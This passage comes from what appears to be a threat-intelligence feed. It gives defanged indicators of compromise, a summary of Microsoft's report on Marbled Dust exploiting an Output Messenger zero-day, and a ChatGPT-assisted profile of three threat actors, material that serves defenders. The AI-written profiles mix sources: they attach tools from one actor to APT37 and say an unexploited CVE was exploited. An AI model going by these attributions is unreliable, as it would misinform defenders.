geopolitical tensions.Threats: roundpress_campaign fancy_bear_group spypress spear-phishing_technique unc3707_group credential_stealing_technique winter_vivern_groupIndicators of compromise:-------------------------ip: 185[.]225[.]69[.]223, 193[.]29[.]104[.]152, 45[.]137[.]222[.]24, 91[.]237[.]124[.]164, 185[.]195[.]237[.]106, 91[.]237[.]124[.]153, 146[.]70[.]125[.]79, 89[.]44[.]9[.]74, 111[.]90[.]151[.]167, 45[.]138[.]87[.]250, 77[.]243[.]181[.]238domain: sqj[.]fr, tgh24[.]xyz, tuo[.]world, lsjb[.]digital, jiaw[.]shop, hfuu[.]by, raxia[.]top, rnl[.]world, hijx[.]xyz, ikses[.]net, ceriossl[.]info, global-world-news[.]net, hfuu[.]deurl: hash: - sha1=60d592765b0f4e08078d42b2f3de4f5767f88773, - sha1=8ebbbc9eb54e216effb437a28b9f2c7c9da3a0fa, - sha1=6ef845938f064de39f4bf6450119a0cdbb61378c, - sha1=a5948e1e45d50a8db063d7dfa5b6f6e249f61652, - sha1=41fe2efb38e0c7dd10e6009a68bd26687d6dbf4c, - sha1=1078c587fe2b246d618af74d157f941078477579, - sha1=f95f26f1c097d4ca38304ecc692dbac7424a5e8d, - sha1=b6c340549700470c651031865c2772d3a4c81310, - sha1=65a8d221b9eced76b9c17a3e1992df9b085cecd7, - sha1=8e6c07f38ef920b5154fd081ba252b9295e8184d, - sha1=ebf794e421be60c9532091eb432c1977517d1be5, - sha1=f81de9584f0bff3e5c6cf1b465f00b2671daa230email: katecohen1984@portugalmail[.]pt, kyivinfo24@ukr[.]net, office@terembg[.]com, srezoska@skiff[.]comTitle: Marbled Dust leverages zero-day in Output Messenger for regional espionageLink: https://www.microsoft.com/en-us/security/blog/2025/05/12/marbled-dust-leverages-zero-day-in-output-messenger-for-regional-espionage/Summary: Microsoft Threat Intelligence has identified a Turkish-affiliated threat actor named Marbled Dust, primarily engaged in espionage, who has been exploiting a zero-day vulnerability (CVE-2025-27920) in the Output Messenger chat application since April 2024. The group targets entities linked to the Kurdish military in Iraq and has previously focused on government organizations in Europe and the Middle East that are seen as opposing Turkish interests. Their operations involve confirming target usage of Output Messenger, gaining access to messaging servers to deploy malicious files for data exfiltration, and employing a backdoor crafted in GoLang to facilitate remote command execution and establish connections with command-and-control domains. Microsoft has notified Output Messenger developers, resulting in patches for the exploited and another unexploited vulnerability (CVE-2025-27921), highlighting the increased sophistication of Marbled Dust's attack methodologies.Threats: sea_turtle_group dns_hijacking_technique typosquatting_technique plink_tool putty_toolIndicators of compromise:-------------------------ip: domain: api[.]wordinfos[.]comurl: https://api[.]wordinfos[.]comhash: - sha256=1df959e4d2f48c4066fddcb5b3fd00b0b25ae44f350f5f35a86571abb2852e39, - sha256=2b7b65d6f8815dbe18cabaa20c01be655d8475fc429388a4541eff193596ae63email:This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
Analysis Summary
This report summarizes information extracted from three distinct threat intelligence summaries within the provided context. Since the request asks for a summary structure based on a single description, I will structure the analysis for the three most distinct, fully described actors found in the provided excerpts.
***
# Threat Actor: UNC5221, UNC5174, and CL-STA-0048 (China-Nexus Nation State Actors)
## Attribution & Identity
APT groups linked to China. Specifically mentions **UNC5221**, **UNC5174**, and **CL-STA-0048**.
## Activity Summary
In April 2025, these groups executed targeted exploitation campaigns against critical infrastructure by exploiting an unauthenticated file upload/RCE vulnerability in **SAP NetWeaver (CVE-2025–31324)**. After gaining initial access, the actors performed reconnaissance on compromised SAP systems connected to industrial control networks, deploying Webshells and the Rust-based malware **KrustyLoader** for persistence and command execution.
## Tactics, Techniques & Procedures
- Exploitation of **CVE-2025–31324** (SAP NetWeaver vulnerability allowing unauthenticated file uploads leading to RCE).
- Reconnaissance on compromised SAP systems connected to industrial control networks.
- Deployment of Webshells.
- Use of **KrustyLoader** (Rust-based malware) for persistence and command execution.
- Evading detection.
- Mention of specific techniques: `opendir_technique`.
- Mention of tools: `powershell_shell_tool`, `sliver_c2_tool`, `goreverse`, `connectwise_tool`, `screenconnect_tool`.
## Targeting
- Sectors: Critical infrastructure, medical device manufacturing, and government.
- Geography: Not explicitly detailed, but implied connection to China nexus targeting critical infrastructure globally.
- Victims: SAP systems connected to industrial control networks.
## Tools & Infrastructure
- Malware families used: **KrustyLoader**, **Webshells**.
- C2/Tools noted: `sliver_c2_tool`, `connectwise_tool`, `screenconnect_tool`.
- Infrastructure (IPs): 15[.]204[.]56[.]106, 43[.]247[.]135[.]53, 54[.]77[.]139[.]23, 3[.]248[.]33[.]252, 103[.]30[.]76[.]206, 45[.]155[.]222[.]14, 159[.]65[.]34[.]242, 138[.]68[.]61[.]82, 192[.]243[.]115[.]175, 107[.]175[.]77[.]118, etc. (List truncated for brevity, see original for full list).
- Infrastructure (Domains): sentinelones[.]com, aaa[.]ki6zmfw3ps8q14rfbfczfq5qkhq8e12q[.]oastify[.]com, applr-malbbal[.]s3[.]ap-northeast-2[.]amazonaws[.]com, etc.
## Implications
These actors pose a significant risk to national and economic security by exploiting widely used enterprise applications (SAP) to gain high-privilege access to sensitive networks, including those controlling industrial operations.
## Mitigations
Patching the exploited vulnerability (**CVE-2025–31324**) in SAP NetWeaver; monitoring for Webshells and unusual activity originating from SAP systems, particularly those connected to industrial control networks.
***
# Threat Actor: APT37 (North Korean)
## Attribution & Identity
**APT37**, a North Korean hacking group, also known by the operation name **Toy Box Story**.
## Activity Summary
The group executed sophisticated **spear-phishing attacks** targeting **North Korean activists**. The lures involved LNK files disguised as invitations to a fake event related to South Korea's national security, distributed via **Dropbox**.
## Tactics, Techniques & Procedures
- Spear-phishing using LNK files.
- Use of **PowerShell scripts** embedded in LNK files to download and execute malware.
- Deployment of malware associated with the **"Rokrat" series**.
- Employing **fileless techniques** to evade detection by traditional antivirus.
- Utilizing trusted cloud services (Dropbox) for Command and Control (C2) communications to complicate detection.
## Targeting
- Sectors: Activists, specifically **North Korean activists**.
- Geography: Targets related to North Korean political interests (activists).
- Victims: North Korean activists.
## Tools & Infrastructure
- Malware families used: **Rokrat series** malware.
- Infrastructure: **Dropbox** utilized for distributing initial compromise files and likely C2.
- Mentioned tool: `plink_tool`, `putty_tool` (Note: These tools were mentioned in the subsequent Marbled Dust summary, but are listed here as context shows mixed IOCs).
## Implications
APT37 demonstrates a consistent focus on ideological targets, leveraging social engineering and fileless techniques to maintain stealthy access to sensitive communications networks.
## Mitigations
Implement strict controls on LNK file execution via email/cloud services; enhance monitoring for fileless activity and PowerShell script execution; analyze network beaconing to public cloud hosting services like Dropbox for anomalous C2 activity.
***
# Threat Actor: Marbled Dust (Turkish-affiliated)
## Attribution & Identity
A **Turkish-affiliated** threat actor named **Marbled Dust**. Associated with activity contextually related to **Sea Turtle Group** mentions.
## Activity Summary
Marbled Dust has been actively exploiting a **zero-day vulnerability (CVE-2025-27920)** in the **Output Messenger** chat application since April 2024 for espionage. They confirm target usage of Output Messenger, access messaging servers, deploy malicious files for data exfiltration, and establish C2.
## Tactics, Techniques & Procedures
- Exploitation of **Output Messenger zero-day (CVE-2025-27920)**.
- Gaining access to messaging servers.
- Deploying backdoors crafted in **GoLang** for remote command execution.
- Use of techniques like **DNS hijacking** and **typosquatting** (`typosquatting_technique`).
- Mentioned tools: `plink_tool`, `putty_tool`.
## Targeting
- Sectors: Government organizations, entities linked to the **Kurdish military in Iraq**.
- Geography: Europe and the Middle East (those seen as opposing Turkish interests).
- Victims: Organizations aligned with Kurdish military groups and specific government entities.
## Tools & Infrastructure
- Malware families used: Custom **GoLang backdoor**.
- Infrastructure (Domains): api[.]wordinfos[.]com.
- Infrastructure (URLs): https://api[.]wordinfos[.]com.
## Implications
Marbled Dust exhibits evolving sophistication by leveraging zero-days in commercial messaging applications popular in target environments, allowing deep access into sensitive communications channels. The exploitation of CVE-2025-27921 (unexploited vulnerability mentioned) suggests proactive vulnerability scanning against related software.
## Mitigations
Rapidly patch Output Messenger for vulnerabilities **CVE-2025-27920** and **CVE-2025-27921**. Monitor network traffic for connections to suspicious domains and analyze GoLang binaries attempting remote command execution.